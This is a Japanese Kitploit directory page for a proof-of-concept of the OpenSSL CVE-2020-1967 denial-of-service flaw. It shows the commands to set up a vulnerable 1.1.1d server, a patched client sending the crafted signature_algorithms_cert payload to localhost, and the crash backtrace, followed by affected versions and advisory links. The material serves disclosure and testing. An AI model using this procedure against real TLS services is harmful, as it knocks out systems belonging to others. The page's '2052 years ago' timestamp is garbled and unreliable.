Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-1967 — OpenSSL signature_algorithms_cert DoS脆弱性 (CVE-2020-1967) に関する概念実証エクスプロイト | Kitploit
ツール/GitHubGitHub/irsl/cve-2020-1967
脆弱性分析エクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubirsl/cve-2020-1967

CVE-2020-1967

OpenSSL signature_algorithms_cert DoS脆弱性 (CVE-2020-1967) に関する概念実証エクスプロイト

リポジトリを見る
2052年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-1967

OpenSSL の signature_algorithms_cert におけるサービス拒否 (DoS) 脆弱性 (CVE-2020-1967) に関する概念実証エクスプロイト。脆弱性の発見は Bernd Edlinger、追加分析は Matt Caswell と Benjamin Kaduk、このデモは Imre Rad によるものです。

前提条件

TLS 1.3 ハンドシェイク中またはその後に SSL_check_chain() 関数を呼び出すサーバまたはクライアントアプリケーション。ドキュメントによると、SSL_check_chain() は、証明書 x、秘密鍵 pk、および証明書チェーン chain が現在のセッション s に適しているかどうかをチェックします。この関数呼び出しは、一般的な Apache httpd や Nginx プロジェクトには存在しません。

デモ

この脆弱性を悪用するには、Hello メッセージの一部として細工された signature_algorithms_cert TLS 拡張を送信する必要があります。私は修正版の openssl ライブラリを使用してそのようなクライアントを構築しました。サーバは組み込みの s_server openssl アプリケーションで、SSL_check_chain を呼び出すコードパスを有効にするために -x オプションを指定しています。

Debian stable でサーバをセットアップする(脆弱性のあるバージョンを明示的に使用):

root@kitploit:~
root@489def7f3594:/data# apt install libssl1.1=1.1.1d-0+deb10u2 openssl=1.1.1d-0+deb10u2
...

root@489def7f3594:/data# openssl version
OpenSSL 1.1.1d  10 Sep 2019

root@489def7f3594:/data# openssl s_server -cert cert.pem -key key.pem  -accept 8443 -verify 1 -tls1_3 -xkey key.pem -xcert cert.pem  -xchain cert.pem
verify depth is 1
Using default temp DH parameters
ACCEPT

修正済みクライアントを使用してペイロードを送信:

root@kitploit:~
root@489def7f3594:/data# /path/to/patched/openssl s_client -connect 127.0.0.1:8443 -tls1_3 -cert cert.pem -key key.pem -sigalgs rsa_pss_rsae_sha256
CONNECTED(00000004)
Sending CVE-2020-1967 payload
...

この時点でサーバはセグメンテーションフォールトを起こすはずです。コアダンプは次のようになります:

root@kitploit:~
root@489def7f3594:/data/1# gdb /data/openssl-1.1.1d/apps/openssl core
GNU gdb (Ubuntu 9.1-0ubuntu1) 9.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /data/openssl-1.1.1d/apps/openssl...
(No debugging symbols found in /data/openssl-1.1.1d/apps/openssl)
[New LWP 26319]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `/data/openssl-1.1.1d/apps/openssl s_server -cert cert.pem -key key.pem -accept'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so
(gdb) bt
#0  0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so
#1  0x00007f09bd03f309 in tls1_check_chain () from /data/openssl-1.1.1d/libssl.so
#2  0x00007f09bd403fc8 in set_cert_cb ()
#3  0x00007f09bd037f75 in tls_post_process_client_hello () from /data/openssl-1.1.1d/libssl.so
#4  0x00007f09bd02703f in state_machine.part () from /data/openssl-1.1.1d/libssl.so
#5  0x00007f09bcffa3f8 in ssl3_write_bytes () from /data/openssl-1.1.1d/libssl.so
#6  0x00007f09bd00fbb9 in ssl_write_internal () from /data/openssl-1.1.1d/libssl.so
#7  0x00007f09bd00fd07 in SSL_write () from /data/openssl-1.1.1d/libssl.so
#8  0x00007f09bd3e337d in sv_body ()
#9  0x00007f09bd40757a in do_server ()
#10 0x00007f09bd3e7c27 in s_server_main ()
#11 0x00007f09bd3cea46 in do_cmd ()
#12 0x00007f09bd3b89fd in main ()

影響を受けるバージョン

影響を受けるバージョン: OpenSSL 1.1.1d、1.1.1e、1.1.1f。 最初の修正バージョンは OpenSSL 1.1.1g です。

参考資料

  • https://www.openssl.org/news/secadv/20200421.txt

  • https://github.com/openssl/openssl/issues/11500

  • https://github.com/openssl/openssl/commit/a87f3fe01a5a894aa27ccd6a239155fd129988e4

ツールをダウンロード